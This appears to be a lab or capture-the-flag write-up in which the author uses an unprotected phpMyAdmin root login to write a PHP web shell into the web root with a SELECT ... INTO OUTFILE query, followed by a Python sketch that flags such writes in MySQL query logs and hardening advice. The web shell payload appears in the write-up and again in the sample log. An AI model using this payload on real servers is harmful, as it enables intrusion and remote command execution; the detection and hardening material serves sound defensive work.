Exploitation

After bypassing the proxy we gained access to a phpMyAdmin page with an empty password for the user root.

The page provided us with the perfect combination of things: phpmyinfo, which would give us the directory names and locations in case we need to write into those files, and a phpMyAdmin that we can access.

This guide allowed me to get a shell on phpMyAdmin.

So we basically create a new table and we run a SQL query like this one:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:/wamp/www/backdoor.php" 

The reason I chose that directory, as I stated before, was because I was able to see the directory that the webserver was being hosted at. Also, now I think I understand why the SQLi in Medjed worked the way it did, because I see what the SQL query in this case is doing as well.
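
From the defender's side, the query above is easy to spot in a MySQL general query log: it is a SELECT ... INTO OUTFILE whose target is a script file under the web root. The following detection sketch is an added example, not part of the original write-up; the log line format, the watch lists and the function names (normalise, classify, scan) are assumptions made for illustration.

```python
import re

# SELECT ... INTO OUTFILE/DUMPFILE '<path>': capture the keyword and target path.
WRITE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\2", re.I)
# Assumed watch lists; C:/wamp/www is the web root named in the write-up.
SCRIPT_EXT = (".php", ".phtml", ".phar", ".asp", ".aspx", ".jsp")
WEB_ROOTS = ("c:/wamp/www", "c:/xampp/htdocs", "/var/www")
CODE_MARKERS = ("<?php", "<?=", "<%")

# Constructed general-query-log style lines (not captured from a real server).
SAMPLE_LOG = [
    "10 Query SELECT id, name FROM customers WHERE id = 7",
    "11 Query SELECT id, name FROM customers INTO OUTFILE '/var/lib/mysql-files/export.csv'",
    "12 Query SELECT \"<?php system($_GET['cmd']); ?>\" into outfile \"C:/wamp/www/backdoor.php\"",
    "13 Query SELECT 'x' INTO DUMPFILE 'C:\\\\wamp\\\\www\\\\img\\\\a.PHP'",
]


def normalise(path):
    """Lower-case, unify separators, collapse slashes doubled by SQL escaping."""
    return re.sub(r"/{2,}", "/", path.replace("\\", "/").lower())


def classify(query):
    """Return (severity, reasons); severity is None when no file write is present."""
    m = WRITE_RE.search(query)
    if not m:
        return None, []
    path = normalise(m.group("path"))
    reasons = ["file write via INTO " + m.group(1).upper()]
    if path.endswith(SCRIPT_EXT):
        reasons.append("script extension")
    if any(path.startswith(root + "/") for root in WEB_ROOTS):
        reasons.append("target under web root")
    if any(marker in query.lower() for marker in CODE_MARKERS):
        reasons.append("server-side code in selected literal")
    severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
    return severity, reasons


def scan(lines):
    """Return (line_number, severity, reasons) for every line containing a file write."""
    hits = [(n,) + classify(line) for n, line in enumerate(lines, 1)]
    return [h for h in hits if h[1] is not None]


if __name__ == "__main__":
    for n, severity, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {severity}: {', '.join(reasons)}")
```

On the server itself, setting secure_file_priv to a directory outside the web root and giving root a password removes the two conditions this write-up relied on.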
